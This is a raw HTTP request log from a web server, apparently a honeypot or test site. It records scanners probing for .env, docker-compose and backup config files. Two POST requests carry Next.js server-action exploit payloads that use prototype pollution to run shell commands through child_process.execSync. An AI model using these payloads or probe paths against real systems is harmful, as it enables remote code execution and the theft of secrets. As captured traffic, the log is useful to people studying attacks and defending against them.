Path: /docker-compose.dev.yml
URL: /docker-compose.dev.yml
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27378
Path: /docker-compose.override.yml
URL: /docker-compose.override.yml
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27368
Path: /docker-compose.yaml
URL: /docker-compose.yaml
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27364
Path: /docker-compose.yml
URL: /docker-compose.yml
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27352
Path: /var/.env
URL: /var/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27342
Path: /private/.env
URL: /private/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27334
Path: /public/.env
URL: /public/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27326
Path: /web/.env
URL: /web/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27320
Path: /client/.env
URL: /client/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27316
Path: /server/.env
URL: /server/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27306
Path: /api/.env
URL: /api/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27294
Path: /frontend/.env
URL: /frontend/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27282
Path: /backend/.env
URL: /backend/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27266
Path: /config/.env
URL: /config/.env
Method: GET
[2026-02-19 13:07:07] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27258
Path: /src/.env
URL: /src/.env
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27246
Path: /app/.env
URL: /app/.env
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27230
Path: /env.json
URL: /env.json
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27226
Path: /env.js
URL: /env.js
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27216
Path: /env
URL: /env
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27200
Path: /.env~
URL: /.env~
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27198
Path: /.env.swp
URL: /.env.swp
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27184
Path: /.env.tmp
URL: /.env.tmp
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27168
Path: /.env.bak
URL: /.env.bak
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27156
Path: /.env.old
URL: /.env.old
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27140
Path: /.env.save
URL: /.env.save
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27132
Path: /.env.backup
URL: /.env.backup
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27122
Path: /.env.staging
URL: /.env.staging
Method: GET
[2026-02-19 13:07:06] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27110
Path: /.env.test
URL: /.env.test
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27106
Path: /.env.prod
URL: /.env.prod
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27096
Path: /.env.dev
URL: /.env.dev
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27090
Path: /.env.development
URL: /.env.development
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27084
Path: /.env.production
URL: /.env.production
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27080
Path: /.env.local
URL: /.env.local
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27072
Path: /.env
URL: /.env
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27062
Path: /.e190
URL: /.e190
Method: GET
[2026-02-19 13:07:05] === HTTP Request ===
[2026-02-19 12:56:51] Main page accessed - IP: 67.213.118.179:51122
===================
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
[]
Content-Disposition: form-data; name="2"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"44657*42099\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 718
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Request-Id: 8wbocjrh
X-Nextjs-Html-Request-Id: 9XydWf0VTNs83mIxHl7um
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 67.213.118.179:51122
Path: /
URL: /
Method: POST
[2026-02-19 12:56:51] === HTTP Request ===
[2026-02-19 12:56:51] Main page accessed - IP: 67.213.118.179:51110
===================
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
[]
Content-Disposition: form-data; name="2"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((44657*42099))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 710
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Next-Action: x
X-Nextjs-Request-Id: 8wbocjrh
X-Nextjs-Html-Request-Id: 9XydWf0VTNs83mIxHl7um
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 67.213.118.179:51110
Path: /
URL: /
Method: POST
[2026-02-19 12:56:51] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 64.112.126.83:50013
Path: /docker-compose.yml
URL: /docker-compose.yml
Method: GET
[2026-02-19 12:10:22] === HTTP Request ===
[2026-02-19 11:26:09] Main page accessed - IP: 176.65.149.45:46128
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:46128
Path: /
URL: /
Method: GET
[2026-02-19 11:26:09] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48802
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-02-19 11:23:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48800
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-19 11:23:13] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48690
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-19 11:23:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48572
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-19 11:23:13] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48468
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 11:23:12] === HTTP Request ===
[2026-02-19 11:23:12] Main page accessed - IP: 118.193.38.134:48298
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/551.40 (KHTML, like Gecko) Chrome/103.0.2982 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.38.134:48298
Path: /
URL: /
Method: GET
[2026-02-19 11:23:12] === HTTP Request ===
[2026-02-19 11:22:39] Main page accessed - IP: 152.32.130.191:48460
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 152.32.130.191:48460
Path: /
URL: /
Method: GET
[2026-02-19 11:22:39] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: ProxyPool-Scanner/2.0
Headers:
Protocol: HTTP/1.1
Host: httpbin.org
RemoteAddr: 204.76.203.93:47418
Path: /ip
URL: http://httpbin.org/ip
Method: GET
[2026-02-19 10:53:42] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.136
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
From: oai-searchbot(at)openai.com
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51284
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-19 10:45:19] === HTTP Request ===
===================
X-Forwarded-Proto: https
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,es;q=0.8
X-Forwarded-For: 34.1.29.53
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /ads.txt
URL: /ads.txt
Method: GET
[2026-02-19 10:11:47] === HTTP Request ===
===================
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Site: none
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9,es;q=0.8
X-Forwarded-For: 34.1.29.53
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-02-19 10:11:47] === HTTP Request ===
===================
Via: 1.1 Caddy
X-Forwarded-For: 34.1.29.53
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: no-cors
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9,es;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-02-19 10:11:47] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Accept-Language: en-US,en;q=0.9,es;q=0.8
X-Forwarded-For: 34.1.29.53
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-19 10:11:46] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9,es;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-For: 34.1.29.53
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-19 10:11:46] === HTTP Request ===
[2026-02-19 10:11:46] Salary page accessed - IP: 172.30.0.12:37722
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9,es;q=0.8
X-Forwarded-For: 34.1.29.53
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /salary
URL: /salary
Method: GET
[2026-02-19 10:11:46] === HTTP Request ===
[2026-02-19 10:11:45] Defects page accessed - IP: 172.30.0.12:37722
===================
Sec-Fetch-Site: none
Cache-Control: max-age=0
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 34.1.29.53
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9,es;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /defects
URL: /defects
Method: GET
[2026-02-19 10:11:45] === HTTP Request ===
===================
X-Forwarded-For: 34.1.29.53
Sec-Fetch-Mode: no-cors
Via: 1.1 Caddy
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Accept-Language: en-US,en;q=0.9,es;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-19 10:11:44] === HTTP Request ===
[2026-02-19 10:11:42] Main page accessed - IP: 172.30.0.12:37722
===================
Cache-Control: max-age=0
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Accept-Language: en-US,en;q=0.9,es;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-For: 34.1.29.53
Via: 1.1 Caddy
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
X-Forwarded-Proto: https
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37722
Path: /
URL: /
Method: GET
[2026-02-19 10:11:42] === HTTP Request ===
[2026-02-19 09:18:41] Main page accessed - IP: 34.38.106.200:53882
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.38.106.200:53882
Path: /
URL: /
Method: GET
[2026-02-19 09:18:41] === HTTP Request ===
[2026-02-19 07:55:36] Main page accessed - IP: 209.38.70.156:45632
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.70.156:45632
Path: /
URL: /
Method: GET
[2026-02-19 07:55:36] === HTTP Request ===
[2026-02-19 05:02:42] Main page accessed - IP: 207.90.244.21:51396
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:51396
Path: /
URL: /
Method: GET
[2026-02-19 05:02:42] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.205:60002
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-19 04:56:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.205:60534
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 04:53:48] === HTTP Request ===
[2026-02-19 04:53:37] Main page accessed - IP: 162.142.125.205:14562
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.205:14562
Path: /
URL: /
Method: GET
[2026-02-19 04:53:37] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.90:38910
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-19 03:35:52] === HTTP Request ===
===================
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.90:38478
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 03:35:51] === HTTP Request ===
[2026-02-19 03:35:50] Main page accessed - IP: 45.142.154.90:38138
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.90:38138
Path: /
URL: /
Method: GET
[2026-02-19 03:35:50] === HTTP Request ===
[2026-02-19 03:35:49] Main page accessed - IP: 45.142.154.90:38076
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.90:38076
Path: /
URL: /
Method: GET
[2026-02-19 03:35:49] === HTTP Request ===
[2026-02-19 00:58:39] Main page accessed - IP: 205.210.31.221:61832
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.221:61832
